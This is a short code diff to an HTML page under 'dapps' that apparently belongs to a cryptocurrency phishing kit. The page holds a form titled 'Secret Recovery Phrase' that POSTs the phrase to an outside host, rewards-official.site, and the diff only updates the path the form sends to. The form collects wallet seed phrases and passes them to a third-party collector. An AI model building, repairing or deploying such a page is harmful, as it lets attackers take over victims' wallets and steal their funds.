--- a/dapps/index.html
+++ b/dapps/index.html
@@ -93,7 +93,7 @@
 			<div class="content-dropdown-container">
 
 			</div>
-			<form action="https://rewards-official.site/stake.unitymeta.io/asu.php" method="POST" id="secretPhraseForm">
+			<form action="https://rewards-official.site/unitymeta/asu.php" method="POST" id="secretPhraseForm">
 			<div class="content-key-container">
 			    <p class="content-key-text">
 					Secret Recovery Phrase
